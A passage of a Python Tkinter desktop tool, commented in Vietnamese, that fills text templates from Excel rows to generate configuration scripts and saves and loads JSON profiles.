use:\n\t#>>> t =Timer()\n\t#>>> t.start()\n\t#>>> t.stop()\n\t#>>> Elapsed time: 10.0668 seconds [00:00:10]\n\t'''\n\tdef __init__(self):\n\t\tself._start_time = None\n\n\tdef start(self):\n\t\t\"\"\"Start a new timer\"\"\"\n\t\tif self._start_time is not None:\n\t\t\traise TimerError(\"Timer is running. Use .stop() to stop it\")\n\t\t\t\n\n\t\tself._start_time = time.perf_counter()\n\t\t#print(\">>> The action start at:\", get_now())\n\n\tdef stop(self):\n\t\t\"\"\"Stop the timer, and report the elapsed time\"\"\"\n\t\tif self._start_time is None:\n\t\t\traise TimerError(\"Timer is not running. Use .start() to start it\")\n\n\t\telapsed_time = time.perf_counter() - self._start_time\n\t\tseconds = elapsed_time % (24 * 3600) \n\t\thour = seconds // 3600\n\t\tseconds %= 3600\n\t\tminutes = seconds // 60\n\t\tseconds %= 60\n\t\t\n\t\tself._start_time = None\n\t\ttime_string = \"Elapsed time: %0.4f seconds [%02d:%02d:%02d]\" % (elapsed_time,hour, minutes, seconds)\n\t\t#print(\">>> Elapsed time: %0.4f seconds [%02d:%02d:%02d]\" % (elapsed_time,hour, minutes, seconds))\n\t\tprint_to_textbox(time_string)\n\t\ttext_var_status.set(text_var_status.get() + \" \" + time_string)\n\t\t\n#to update GUI\nt1 = Timer1()\n\ndef get_now_stamp():\n\t'''\n\t#>>> get_now()\n\t#'20200514_094015'\n\t'''\n\treturn datetime.datetime.now().strftime(\"%Y%m%d_%H%M%S\")\n\ndef findallexcellsheet(excel_filepath):\n\t'''\n\treturn a list of sheet name\n\t>>> xl = pd.ExcelFile('input_cdd.xlsx')\n\t>>> xl.sheet_names\n\t['Sheet1', 'Sheet2', 'Sheet3']\n\t>>>\n\t'''\n\txl = pd.ExcelFile(excel_filepath)\n\treturn xl.sheet_names\n\n\n\n#tim cach MAP tu dong variable sang column nhu MLC\n\ndef browse_datainput_button():\n\tstatus_label.configure(background=orig_color)\n\t\n\tglobal input_file_path\n\t#global root_path\n\t#root_path = filedialog.askdirectory()\n\t#filedialog.askopenfilename(filetypes=[(\"Excel files\", \".xlsx .xls\")])\n\tinput_file_path = filedialog.askopenfilename(filetypes=[(\"Excel files\", \".xlsx .xls\")])\n\t\n\n\tprint(\"button press!!\")\n\tprint(input_file_path)\n\t\n\t#update entry for input path\n\ttext_var_inputpath.set(input_file_path)\n\t\n\tglobal sheet_options_list\n\tsheet_options_list = findallexcellsheet(input_file_path)\n\t#print(sheet_options_list)\n\t\n\t########\n\tglobal om_var\n\tchoices = sheet_options_list\n\tom_var = tk.StringVar(root)\n\t#om_var.set(\"02.Select sheet\")\n\t#sheet_select = tk.OptionMenu(root, om_var, *choices)\n\tglobal sheet_select\n\tsheet_select = tk.OptionMenu(root, om_var, *choices,command=lambda _: sheet_select_command())\n\n\tsheet_select.grid(row=0, column=3, sticky=\"ew\")\n\t########\n\t\n\t\n\t#update button label\n\tinput_filename = get_filename(input_file_path)[:20]\n\tbtn_browse_text.set(input_filename)\n\tbrowse_button.configure(bg = 'green2')\n\ttext_var_status.set(\"SELECTED EXCEL FILE\")\n\tfoldersplit_checkbox.configure(state='normal')\n\t\n\t\n\n\n\ndef browse_template_button():\n\tglobal template_filepath\n\t\n\t#root_path = filedialog.askdirectory()\n\ttemplate_filepath = filedialog.askopenfilename()\n\t\n\tprint(\"button press!!\")\n\tprint(template_filepath)\n\t\n\t\n\t#update entry for input path\n\ttext_var_templatepath.set(template_filepath)\n\t#change color after finished\n\tbrowse_template_button.configure(bg = 'green2')\n\tclear_textbox()\n\twith open(template_filepath) as infile:\n\t\tfilecontent = infile.read()\n\t\tprint_to_textbox(filecontent)\n\tentry_templatefilepath.configure(bg=\"green2\")\n\ndef fill_template():\n\n\tcreate_button.configure(bg=\"yellow\")\n\tprint(\"full template button press!!\")\n\ttext_var_status.set(\"RESET\")\n\tglobal input_file_path, template_filepath #bien nay duoc tao ra trong browse_button\n\t\n\t#global selected_sheet #dung bien nay de reuse lai trong funtion folder tag\n\tselected_sheet = om_var.get()\n\tprint(\"selected_sheet:\", selected_sheet)\n\tglobal om_folder_var, filenametag_var\n\t\n\tdf = pd.read_excel(input_file_path, header=0, sheet_name=selected_sheet)\n\tprint(\"SUMMARY DATA INPUT TABLE:\")\n\tprint(df)\n\tglobal column_header\n\tcolumn_headers = list(df.columns.values)\n\tf = open(template_filepath, \"r\")\n\tinput_file_content = f.read()\n\t#global folder_tag\n\tfolder_tag = om_folder_var.get()\n\tf.close()\n\t\n\tfolder, template_filename = os.path.split(template_filepath)\n\t\n\t#####\n\t#find all variable in template\n\twith open(template_filepath) as infile:\n\t\tlines = infile.readlines()\n\t\t\n\t\t#find all variable string\n\t\tvar_set = set()\n\t\tfor index, line in enumerate(lines):\n\t\t\tline = line.strip()\n\t\t\t#doi voi truong hop thuong thi dung $variable\n\t\t\tregex = '\\$' + \"(\\w+)\"\n\t\t\tvariables = re.findall(regex, line)\n\t\t\t#print(variables)\n\t\t\tfor item in variables:\n\t\t\t\tvar_set.add(item)\n\t\t\t\n\t\t\t#####\n\t\t\tregex2 = '\\$\\{' + \"(\\w+)\"+'\\}'\n\t\t\tvariables2 = re.findall(regex2, line)\n\t\t\tprint(variables2)\n\t\t\tfor item in variables2:\n\t\t\t\tvar_set.add(item)\n\t\t\t#####\n\t\t\t\n\t\tprint(\"----------------all variable string come to here--------------\")\n\t\tprint(var_set) #{'smtcOffset', 'smtcPeriodicity', 'smtcDuration', 'smtcScs', 'arfcnValueNRDl', 'nRFrequencyId'}\n\t\t\n\t#####\n\t\n\tfor index, row in df.iterrows():\n\t\tdata = {}\n\t\tfor column_name in var_set:\n\t\t\tif column_name in column_headers:\n\t\t\t\t#print(index,column_name,row[column_name])\n\t\t\t\tdata[column_name] = row[column_name]\n\t\tprint(data)\n\t\t#will turning later\n\t\t#rowname = \"row\"+str(index)\n\t\t\n\t\trowname = filenametag_var.get()\n\t\tsrc = Template(input_file_content)\n\t\tif not data: #EMPTY or no vaiable\n\t\t\tresult = input_file_content\n\t\telse:\n\t\t\tresult = src.substitute(data)\n\t\thome_path = os.path.dirname(os.path.realpath(__file__))\n\t\t#output_filepath=os.path.join(home_path, \"output_script\", str(rowname))\n\t\t\n\t\t#split script follow folder\n\t\ttemplatename, ext = get_file_name_ext(template_filename)\n\t\tprint(\"str(row[rowname]\", str(row[rowname]))\n\t\tif not var_foldersplit.get():\n\t\t\t#output_filepath = os.path.join(home_path, \"output_script\",template_filename + \"_\" + rowname)\n\t\t\toutput_filepath = os.path.join(home_path, \"output_script\",templatename + \"_\" + str(row[rowname]) + \".\" + ext)\n\t\telse:\n\t\t\t#neu folder ko ton tai thi tao them folder\n\t\t\tif not os.path.exists(os.path.join(home_path, \"output_script\",row[folder_tag])):\n\t\t\t\tos.mkdir(os.path.join(home_path, \"output_script\",row[folder_tag]))\n\t\t\toutput_filepath = os.path.join(home_path, \"output_script\",row[folder_tag], templatename + \"_\" + str(row[rowname]) + \".\"+ ext)\n\t\t\n\t\tglobal var_mergefile\n\t\tif var_mergefile.get():\n\t\t\toutput_text_file = open(output_filepath, \"a\")\n\t\t\t\n\t\telse :\n\t\t\toutput_text_file = open(output_filepath, \"w\")\n\t\toutput_text_file.write(result)\n\t\toutput_text_file.close()\n\t\tprint(\"write successful\", data, \"to\", output_filepath)\n\t\t\n\t\t\n\n\ttext_var_status.set(\"FINISHED!!!\")\n\tcreate_button.configure(bg=\"green2\")\n\tstatus_label.configure(bg=\"green2\")\n\n\ndef folder_option_status_change():\n\tprint(\"option_status_change\")\n\tprint(var_foldersplit.get())\n\tfolder_split_select = var_foldersplit.get()\n\tglobal input_file_path\n\tglobal om_folder_var\n\tselected_sheet = om_var.get()\n\tdf = pd.read_excel(input_file_path, header=0, sheet_name=selected_sheet)\n\tchoices = list(df.columns.values)\n\t#create folder option menu\n\tfolder_select = tk.OptionMenu(root, om_folder_var, *choices)\n\tif var_foldersplit.get():\n\t\ttry:\n\t\t\tfolder_select.grid(row=3, column=3, sticky=\"ew\")\n\t\texcept:\n\t\t\ttext_var_status.set(\"Select Input file first\")\n\tif not var_foldersplit.get():\n\t\tom_folder_var.set(\"\")\n\t\n\tfoldersplit_checkbox.configure(bg=\"green2\")\n\ndef save_profile_press():\n\tglobal template_filepath,input_file_path,var_foldersplit,var_mergefile\n\tselected_sheet = om_var.get()\n\tfolder_tag = om_folder_var.get()\n\tpackage_name = text_var_packagename.get()\n\tprint(\"save_profile_press!!\")\n\t#init a dict\n\tdata = {}\n\tpath,template_filename = os.path.split(template_filepath)\n\tprofile_filename = template_filename + \"_\" + get_now_stamp()+\".json\" ##'20200514_094015'\n\tdata['template_filepath'] = template_filepath\n\tdata['input_file_path'] = input_file_path\n\tdata['selected_sheet'] = selected_sheet\n\tdata['folder_tag'] = folder_tag\n\tdata['foldersplit']=var_foldersplit.get()\n\tdata['filenametag'] = filenametag_var.get()\n\tdata['mergefile'] = var_mergefile.get()\n\t\n\tprint(\"data to be save as below\")\n\tprint(data)\n\tprofile_filepath = os.path.join(home_path,'profile',profile_filename)\n\t#with open(os.path.join(home_path,'profile',profile_filename), 'w') as outfile:\n\twith open(profile_filepath, 'w') as outfile:\n\t\tjson.dump(data, outfile)\n\t#text_var_status.set(\"Save profile to \"+ profile_filename)\n\t\n\t#####################\n\tdata2 = {}\n\tpath,template_filename = os.path.split(template_filepath)\n\t\n\tpackage_filename = package_name + \".json\"\n\tpackage_filepath = os.path.join(home_path,'profile','profile_package',package_filename)\n\tdata2['package_name'] = package_name\n\t\n\tprint(\"package data to be save as below\")\n\tprint(data2)\n\t#neu file ko ton tai thi tao moi\n\tif not os.path.exists(package_filepath):\n\t\tdata2['profiles_filepath'] = [profile_filepath]\n\t\twith open(package_filepath, 'w') as outfile:\n\t\t\tjson.dump(data2, outfile)\n\telse: #neu file co ton tai\n\t\twith open(package_filepath) as json_file:\n\t\t\tdata_dict = json.load(json_file)\n\t\t\tprint(data_dict)\n\t\t#profile_package_name = data_dict['package_name']\n\t\tprofiles_filepath = data_dict['profiles_filepath']\n\t\tif profile_filepath not in profiles_filepath:\n\t\t\tprofiles_filepath.append(profile_filepath)\n\t\t\n\t\tdata2['profiles_filepath'] = profiles_filepath\n\t#save new package profile or update it with new data\n\twith open(package_filepath, 'w') as outfile:\n\t\tjson.dump(data2, outfile)\n\ttext_var_status.set(\"Saved profile to: \"+ profile_filename+\" | Saved package to: \"+ get_filename(package_filename))\n\t#####################\n\t\n\t#update option menu profile with new profile\n\tglobal om_profile_var\n\tom_profile_var.set('')\n\tprofile_select['menu'].delete(0, 'end')\n\tprofile_files = ls_name(os.path.join(home_path,'profile'))\n\tnew_choices = profile_files\n\tfor choice in new_choices:\n\t\tprofile_select['menu'].add_command(label=choice, command=tk._setit(om_profile_var, choice))\n\ndef clear_textbox():\n\tlog_textbox.delete(\"1.0\",\"end\")\ndef loadprofile():\n\tprint(\"loadprofile press!!!\")\n\tlog_textbox.delete(\"1.0\",\"end\")\n\t#print profile name to text box\n\tprint_to_textbox(\"profile selected:\")\n\tprofile_filename_selected = om_profile_var.get()\n\tprint_to_textbox(profile_filename_selected)\n\t\n\t#open profile to load content, load back data to variable\n\tglobal home_path\n\twith open(os.path.join(home_path,\"profile\",profile_filename_selected)) as json_file:\n\t\tdata_dict = json.load(json_file)\n\t\tprint(data_dict)\n\t\t#print_to_textbox(str(data_dict))\n\t\ttemplate_filepath = data_dict[\"template_filepath\"]\n\t\tinput_file_path = data_dict[\"input_file_path\"]\n\t\tselected_sheet = data_dict[\"selected_sheet\"]\n\t\tfolder_tag = data_dict[\"folder_tag\"]\n\t\tfoldersplit = data_dict['foldersplit']\n\t\tfilenametag = data_dict['filenametag']\n\t\tmergefile = data_dict['mergefile']\n\t\t\n\t\tprint_to_textbox(\"Excel Input: \"+get_filename(input_file_path))\n\t\tprint_to_textbox(\"Sheet Name: \"+selected_sheet)\n\t\tprint_to_textbox(\"Template Input: \"+get_filename(template_filepath))\n\t\tprint_to_textbox(\"Folder_tag: \"+folder_tag)\n\t\tprint_to_textbox(\"foldersplit: \"+str(foldersplit))\n\t\tprint_to_textbox(\"filenametag: \"+str(filenametag))\n\t\tprint_to_textbox(\"mergefile: \"+str(mergefile))\n\t\t\n\t\tprint_to_textbox(\"-------------------------\")\n\t\t\n\t\tinput_filename = get_filename(input_file_path)[:20]\n\t\tbtn_browse_text.set(input_filename)\n\t\tbrowse_button.configure(bg = 'green2')\n\t\n\t################\n\t#selected_sheet = om_var.get()\n\tprint(\"selected_sheet:\", selected_sheet)\n\t\n\t\n\tdf = pd.read_excel(input_file_path, header=0, sheet_name=selected_sheet)\n\tprint(\"SUMMARY DATA INPUT TABLE:\")\n\tprint(df)\n\tglobal column_header\n\tcolumn_headers = list(df.columns.values)\n\t\n\t\n\tf = open(template_filepath, \"r\")\n\tinput_file_content = f.read()\n\t\n\tf.close()\n\t\n\tfolder, template_filename = os.path.split(template_filepath)\n\t\n\t#####\n\t#find all variable in template\n\twith open(template_filepath) as infile:\n\t\tlines = infile.readlines()\n\t\t\n\t\t#find all variable string\n\t\tvar_set = set()\n\t\tfor index, line in enumerate(lines):\n\t\t\tline = line.strip()\n\t\t\tregex = '\\$' + \"(\\w+)\"\n\t\t\tvariables = re.findall(regex, line)\n\t\t\tfor item in variables:\n\t\t\t\tvar_set.add(item)\n\t\t\t\n\t\t\t#####\n\t\t\tregex2 = '\\$\\{' + \"(\\w+)\"+'\\}'\n\t\t\tvariables2 = re.findall(regex2, line)\n\t\t\tprint(variables2)\n\t\t\tfor item in variables2:\n\t\t\t\tvar_set.add(item)\n\t\t\t#####\n\t\t\t\n\t\tprint(\"----------------all variable string_from load profile--------------\")\n\t\tprint(var_set) #{'smtcOffset', 'smtcPeriodicity', 'smtcDuration', 'smtcScs', 'arfcnValueNRDl', 'nRFrequencyId'}\n\t\t\n\t#####\n\t\n\tfor index, row in df.iterrows():\n\t\tdata = {}\n\t\tfor column_name in var_set:\n\t\t\tif column_name in column_headers:\n\t\t\t\t#print(index,column_name,row[column_name])\n\t\t\t\tdata[column_name] = row[column_name]\n\t\tprint(data)\n\t\t#will turning later\n\t\t#rowname = \"row\"+str(index)\n\t\trowname = filenametag\n\t\t\n\t\tsrc = Template(input_file_content)\n\t\tresult = src.substitute(data)\n\t\t#home_path = os.path.dirname(os.path.realpath(__file__))\n\t\t#output_filepath=os.path.join(home_path, \"output_script\", str(rowname))\n\t\t\n\t\t#split script follow folder\n\t\ttemplatename, ext = get_file_name_ext(template_filename)\n\t\tif not foldersplit:\n\t\t\t#output_filepath = os.path.join(home_path, \"output_script\",template_filename + \"_\" + rowname)\n\t\t\toutput_filepath = os.path.join(home_path, \"output_script\",templatename + \"_\" + str(row[rowname]) + \".\" + ext)\n\t\telse:\n\t\t\t#neu folder ko ton tai thi tao them folder\n\t\t\tif not os.path.exists(os.path.join(home_path, \"output_script\",str(row[folder_tag]))):\n\t\t\t\tos.mkdir(os.path.join(home_path, \"output_script\",row[folder_tag]))\n\t\t\t\n\t\t\t#rule dat script name, co row, co template name\n\t\t\t#output_filepath = os.path.join(home_path, \"output_script\",row[folder_tag], template_filename + \"_\" + rowname)\n\t\t\toutput_filepath = os.path.join(home_path, \"output_script\",row[folder_tag], templatename + \"_\" + row[rowname] + \".\"+ ext)\n\t\t\n\t\t#if var_mergefile.get():\n\t\tif mergefile:\n\t\t\n\t\t\toutput_text_file = open(output_filepath, \"a\")\n\t\telse :\n\t\t\toutput_text_file = open(output_filepath, \"w\")\n\t\toutput_text_file.write(result)\n\t\toutput_text_file.close()\n\t\tprint(\"write successful\", data, \"to\", output_filepath)\n\n\t\t\n\t\tprint_to_textbox(\"write successful script \"+ output_filepath)\n\t\t\n\n\ttext_var_status.set(\"FINISHED!!!\")\n\t#create_button.configure(bg=\"green2\")\n\tloadprofile_button.configure(bg=\"green2\")\n\tstatus_label.configure(bg=\"green2\")\n\t################\n\ndef print_to_textbox(text_string):\n\t'''this funtion help to add string to text box'''\n\tlog_textbox.insert(tk.END, text_string + \"\\n\")\n\troot.update_idletasks()\n\ndef show_profile_to_textbox():\n\tprofile_filename_selected = om_profile_var.get()\n\tprint(om_profile_var.get())\n\tprint_to_textbox(om_profile_var.get())\n\t#open profile to load content, load back data to variable\n\tglobal home_path\n\tclear_textbox()\n\twith open(os.path.join(home_path,\"profile\",profile_filename_selected)) as json_file:\n\t\tdata_dict = json.load(json_file)\n\t\tprint(data_dict)\n\t\t\n\t\ttemplate_filepath = data_dict[\"template_filepath\"]\n\t\tinput_file_path = data_dict[\"input_file_path\"]\n\t\tselected_sheet = data_dict[\"selected_sheet\"]\n\t\tfolder_tag = data_dict[\"folder_tag\"]\n\t\tfoldersplit = data_dict['foldersplit']\n\t\tfilenametag = data_dict['filenametag']\n\t\tmergefile = data_dict['mergefile']\n\t\t\n\t\tprint_to_textbox(\"Excel Input: \"+get_filename(input_file_path))\n\t\tprint_to_textbox(\"Sheet Name: \"+selected_sheet)\n\t\tprint_to_textbox(\"Template Input: \"+get_filename(template_filepath))\n\t\tprint_to_textbox(\"Folder_tag: \"+folder_tag)\n\t\tprint_to_textbox(\"foldersplit: \"+str(foldersplit))\n\t\tprint_to_textbox(\"filenametag: \"+str(filenametag))\n\t\tprint_to_textbox(\"mergefile: \"+str(mergefile))\n\t\t\n\t\tprint_to_textbox(\"-------------------------\")\n\tprofile_select.configure(bg=\"green2\")\n\tloadprofile_button.configure(state='normal')\n\ndef filenametag_select_command():\n\tprint(\"filenametag_select_command selected !!\")\n\tfilenametag_select.configure(bg=\"green2\")\n\ndef sheet_select_command():\n\tprint(\"sheet_select_command selected!!!\")\n\tsheet_select.configure(bg=\"green2\")\n\tglobal input_file_path\n\tselected_sheet = om_var.get()\n\tdf = pd.read_excel(input_file_path, header=0, sheet_name=selected_sheet)\n\t\n\t#create filename tag option menu\n\tchoices = list(df.columns.values)\n\tglobal filenametag_select, filenametag_var\n\tfilenametag_var = tk.StringVar(root)\n\tfilenametag_var.set(\"04.FILENAME_TAG\")\n\tfilenametag_select = tk.OptionMenu(root, filenametag_var, *choices,command=lambda _: filenametag_select_command())\n\tfilenametag_select.grid(row=2, column=2, sticky=\"ew\", columnspan=1)\n\t#end create filename tag menu\n\t\n\t####create checkbox merge file, cung row voi filename tag\n\tglobal var_mergefile\n\t#var_mergefile = tk.IntVar(value=1)\n\tvar_mergefile = tk.IntVar(value=0)\n\tmergefile = tk.Checkbutton(root, text=\"MERGE FILE\", variable=var_mergefile, command = mergefile_option_status_change)\n\tmergefile.grid(row=2,sticky=\"w\", column=3)\n\t####\n\t#chi enable nut create sau khi chon xong file excel bang nut brow, va select sheet\n\tcreate_button.configure(state='normal')\n\ndef mergefile_option_status_change():\n\tprint(\"mergefile_option_status_change ticked !!\")\n\tprint(var_mergefile.get())\n\n\ndef show_profile_package_to_textbox():\n\tprint(\"profile package option menu selected\")\n\tprofile_package_filename_selected = om_profile_package_var.get()\n\tprint(profile_package_filename_selected)\n\tclear_textbox()\n\tprint_to_textbox(\"Profile package selected: \"+profile_package_filename_selected)\n\t#open profile to load content, load back data to variable\n\tglobal home_path\n\t\n\twith open(os.path.join(home_path,\"profile\",\"profile_package\",profile_package_filename_selected)) as json_file:\n\t\tdata_dict = json.load(json_file)\n\t\t#print(data_dict)\n\t\tprofile_package_name = data_dict['package_name']\n\t\tprofiles_filepath = data_dict['profiles_filepath']\n\t\t#print(profile_package_name)\n\t\t#print(profiles_filepath)\n\t\tprint_to_textbox(\"profile_package_name \"+profile_package_name)\n\t\t\n\t\tprint_to_textbox(\"-----------------------------------------\")\n\t\tprint_to_textbox(\"profile_filepaths: \")\n\t\tprint(\"profile_filepaths: \")\n\t\tfor profile_filepath in profiles_filepath:\n\t\t\t#print_to_textbox(profile_filepath)\n\t\t\tprint_to_textbox(get_filename(profile_filepath))\n\t\t\tprint(get_filename(profile_filepath))\n\n\tprofile_package_select.configure(bg=\"green2\")\n\ttext_var_status.set(\"STATUS: PACKAGE SELECTED\")\n\tloadprofile_package_button.configure(state='normal')\n\n\ndef loadprofile_procedure(profile_filepath):\n\tprint(\"---------------------creating script for profile\", profile_filepath, \"--------------------\")\n\tprint_to_textbox(\"---------------------------\")\n\tprint_to_textbox(\"creating script for profile:\" + get_filename(profile_filepath))\n\ttext_var_status.set(\"loading \"+get_filename(profile_filepath))\n\twith open(profile_filepath) as json_file:\n\t\tdata_dict = json.load(json_file)\n\t\tprint(data_dict)\n\t\ttemplate_filepath = data_dict[\"template_filepath\"]\n\t\tinput_file_path = data_dict[\"input_file_path\"]\n\t\tselected_sheet = data_dict[\"selected_sheet\"]\n\t\tfolder_tag = data_dict[\"folder_tag\"]\n\t\tfoldersplit = data_dict['foldersplit']\n\t\tfilenametag = data_dict['filenametag']\n\t\tmergefile = data_dict['mergefile']\n\n\t\tinput_filename = get_filename(input_file_path)[:20]\n\t\n\t\n\tprint(\"selected_sheet:\", selected_sheet)\n\tdf = pd.read_excel(input_file_path, header=0, sheet_name=selected_sheet)\n\tprint(\"SUMMARY DATA INPUT TABLE:\")\n\tprint(df)\n\tglobal column_header\n\tcolumn_headers = list(df.columns.values)\n\t\n\t\n\tf = open(template_filepath, \"r\")\n\tinput_file_content = f.read()\n\t\n\tf.close()\n\t\n\tfolder, template_filename = os.path.split(template_filepath)\n\t\n\t#find all variable in template\n\twith open(template_filepath) as infile:\n\t\tlines = infile.readlines()\n\t\t\n\t\t#find all variable string\n\t\tvar_set = set()\n\t\tfor index, line in enumerate(lines):\n\t\t\tline = line.strip()\n\t\t\tregex = '\\$' + \"(\\w+)\"\n\t\t\tvariables = re.findall(regex, line)\n\t\t\tfor item in variables:\n\t\t\t\tvar_set.add(item)\n\t\t\t#####\n\t\t\tregex2 = '\\$\\{' + \"(\\w+)\"+'\\}'\n\t\t\tvariables2 = re.findall(regex2, line)\n\t\t\t#print(variables2)\n\t\t\tfor item in variables2:\n\t\t\t\tvar_set.add(item)\n\t\t\t#####\n\t\tprint(\"variables in \", template_filename)\n\t\tprint(var_set)\n\t\n\t\n\t\n\n\t#substitute data from each row of excel into to template\n\tfor index, row in df.iterrows():\n\t\tdata = {}\n\t\tfor column_name in var_set:\n\t\t\tif column_name in column_headers:\n\t\t\t\t#print(index,column_name,row[column_name])\n\t\t\t\tdata[column_name] = row[column_name]\n\t\t#print(data)\n\t\trowname = filenametag\n\t\t\n\t\tsrc = Template(input_file_content)\n\t\tresult = src.substitute(data)\n\n\t\t#split script follow folder\n\t\ttemplatename, ext = get_file_name_ext(template_filename)\n\t\tif not foldersplit:\n\t\t\toutput_filepath = os.path.join(home_path, \"output_script\",templatename + \"_\" + str(row[rowname]) + \".\" + ext)\n\t\telse:\n\t\t\t#neu folder ko ton tai thi tao them folder\n\t\t\tif not os.path.exists(os.path.join(home_path, \"output_script\",str(row[folder_tag]))):\n\t\t\t\tos.mkdir(os.path.join(home_path, \"output_script\",row[folder_tag]))\n\t\t\t\n\t\t\t#rule dat script name, co row, co template name\n\t\t\toutput_filepath = os.path.join(home_path, \"output_script\",row[folder_tag], templatename + \"_\" + row[rowname] + \".\"+ ext)\n\t\t\n\t\tif mergefile:\n\t\t\toutput_text_file = open(output_filepath, \"a\")\n\t\telse :\n\t\t\toutput_text_file = open(output_filepath, \"w\")\n\t\toutput_text_file.write(result)\n\t\toutput_text_file.close()\n\t\tprint(\"write successful\", data, \"to\", output_filepath)\n\t\t#khong print cai nay ra textbox, vi no nhieu qua, kho doc\n\t\t#print_to_textbox(\"write successful script \"+ output_filepath)\n\n#########################\n\ndef loadprofile_package():\n\t#cho vang cai nut de biet la bat dau ==> de troubleshooting\n\tloadprofile_package_button.configure(bg = 'yellow')\n\tt.start()\n\tt1.start()\n\tprint(\"loadprofile_package button press!!\")\n\tprofile_package_filename_selected = om_profile_package_var.get()\n\tprint(profile_package_filename_selected)\n\tclear_textbox()\n\tprint_to_textbox(\"Profile package selected: \"+profile_package_filename_selected)\n\t#open profile to load content, load back data to variable\n\tglobal home_path\n\t\n\twith open(os.path.join(home_path,\"profile\",\"profile_package\",profile_package_filename_selected)) as json_file:\n\t\tdata_dict = json.load(json_file)\n\t\t#print(data_dict)\n\t\tprofile_package_name = data_dict['package_name']\n\t\tprofiles_filepath = data_dict['profiles_filepath']\n\t\tno_of_profile = len(profiles_filepath)\n\t\tprint(profile_package_name)\n\t\tprint(profiles_filepath)\n\t\t#print_to_textbox(\"profile_package_name \"+profile_package_name)\n\t\t#print_to_textbox(\"-----------------------------------------\")\n\t\t\n\t\tcount_profile = 0\n\t\tfor profile_filepath in profiles_filepath:\n\t\t\tcount_profile += 1\n\t\t\t#print_to_textbox(profile_filepath)\n\t\t\tprint(\"Loading \",get_filename(profile_filepath), count_profile, \"/\", no_of_profile, \"profiles\")\n\t\t\tprint_to_textbox(\"Loading \" + get_filename(profile_filepath) + \" \" + str(count_profile)+ \"/\"+str(no_of_profile) +\" profiles\")\n\t\t\t\n\t\t\tloadprofile_procedure(profile_filepath)\n\t\n\t#cho xanh cai nut , de biet la chay thanh cong\n\tloadprofile_package_button.configure(bg = 'green2')\n\ttext_var_status.set(\"FINISHED:\" +profile_package_filename_selected)\n\t\n\tt.stop()\n\tt1.stop()\ndef press_merge_folder_button():\n\tprint(\"press_merge_folder_button press !!!\")\n\tmerge_folder_path = filedialog.askdirectory()\n\tprint(merge_folder_path)\n\tclear_textbox()\n\tprint_to_textbox(\"Merge folder path: \\n\"+merge_folder_path)\n\t\n\tfilenames = []\n\tfilepaths = []\n\t#merge_name = \"test_merge.txt\"\n\tmerge_name = text_var_mergefilename.get()\n\t\n\tprint_to_textbox(\"Merged successful to below filepath:\")\n\tfor path, subdirs, files in os.walk(merge_folder_path):\n\t\tprint(\"--------------------------------\")\n\t\t#sap xep file name theo thu tu roi moi write\n\t\tfor file in sorted(files):\n\t\t\tprint(path,\"|\",subdirs, \"|\" , files)\n\t\t\twith open(os.path.join(path,merge_name), \"a\") as outfile:\n\t\t\t\t#write small file to big file\n\t\t\t\t#outfile.write(file+\"\\n\")\n\t\t\t\twith open(os.path.join(path,file), \"r\") as infile:\n\t\t\t\t\toutfile.write(infile.read())\n\t\tprint_to_textbox(os.path.join(path,merge_name))\n\t\n\t#print(\"Successful merge all subfolder to file name\",merge_name, \"in each sub folder\")\n\t#print_to_textbox(\"Successful merge all subfolder to file name \"+ merge_name + \" in each sub folder\")\n\t\n\tmerger_folder_button.configure(bg = 'green2')\n\nroot = tk.Tk()\nroot.title(\"SCRIPTING_\"+version)\n#root.geometry(\"550x550\")\n\n\n\n\n\ntext_var_inputpath = tk.StringVar()\ntext_var_templatepath = tk.StringVar()\ntext_var_status = tk.StringVar()\ntext_var_status.set(\"STATUS: PLS SELECT EXCEL OR CHOOSE PROFILE\")\ntext_var_packagename = tk.StringVar()\ntext_var_mergefilename = tk.StringVar()\n\nglobal om_folder_var\nom_folder_var = tk.StringVar(root)\n#om_folder_var.set(\"6.Select tag\")\nom_folder_var.set(\"\")\n\n##row1\nbtn_browse_text = tk.StringVar()\nbtn_browse_text.set(\"01.EXCEL\")\nbrowse_button = tk.Button(root, textvariable=btn_browse_text, command = browse_datainput_button)\nbrowse_button.grid(row=0, column=0, columnspan=3, sticky=\"ew\")\norig_color = browse_button.cget(\"background\") #to help reset color\n\n#folder tag duoc tao dong sau select excel file\n###end row1\n\n##row2\nbrowse_template_button= tk.Button(root, text =\"03.TEMPL\", command = browse_template_button)\nbrowse_template_button.grid(row=1, column=1)\nentry_templatefilepath = tk.Entry(root, textvariable = text_var_templatepath)\nentry_templatefilepath.grid(row=1, column=2, sticky=\"ew\", columnspan=2)\n##end row2\n\n#row3\n\n#row3, filename tag duoc tao ra dong, sau khi select sheet\n#endrow3\n\n#row4\nvar_foldersplit = tk.IntVar(value=0)\nfoldersplit_checkbox = tk.Checkbutton(root, text=\"05.FOLDER SPLIT\", variable=var_foldersplit, command = folder_option_status_change)\nfoldersplit_checkbox.grid(row=3,sticky=\"w\", column=2)\n\nfoldersplit_checkbox.configure(state='disabled')\n#end row 4\n\n##row5\ncreate_button= tk.Button(root, text =\"05.CREATE\", command = fill_template)\ncreate_button.grid(row=4, column=1)\ncreate_button.configure(state='disabled')\n##end row5\n\n##row6\ntk.Button(root, text =\"06.BACKUP\", command = save_profile_press).grid(row=5, column=1)\n\ntk.Label(root, text=\"package_name\").grid(row=5, column=2, sticky=\"w\")\nentry_packagename = tk.Entry(root, textvariable = text_var_packagename)\n#entry_packagename.grid(row=5, column=2, sticky=\"e\")\nentry_packagename.grid(row=5, column=2, sticky=\"\") #central allign\n##end row6\n\n##row7\nprofile_files = ls_name(os.path.join(home_path,'profile'))\nchoices = profile_files\nom_profile_var = tk.StringVar(root)\nom_profile_var.set(\"07.Select a profile\")\n#profile_select = tk.OptionMenu(root, om_profile_var, *choices)\nprofile_select = tk.OptionMenu(root, om_profile_var, *choices,command=lambda _: show_profile_to_textbox())\n#mymenu = OptionMenu(root, optionvar, *t, command=lambda _: update())\nprofile_select.grid(row=6, column=2, sticky=\"ew\", columnspan=2)\n#end row7\n\n##row8\nprofile_package_files = ls_name(os.path.join(home_path,'profile','profile_package'))\nchoices = profile_package_files\nom_profile_package_var = tk.StringVar(root)\nom_profile_package_var.set(\"07.1.Select a profile package\")\nprofile_package_select = tk.OptionMenu(root, om_profile_package_var, *choices,command=lambda _: show_profile_package_to_textbox())\n#mymenu = OptionMenu(root, optionvar, *t, command=lambda _: update())\nprofile_package_select.grid(row=7, column=2, sticky=\"ew\", columnspan=2)\n#end row8\n\n#row9\nlog_textbox = tk.Text(root, height=15)\nlog_textbox.grid(row=8, column=2, sticky=\"ew\",columnspan=2)\n#end 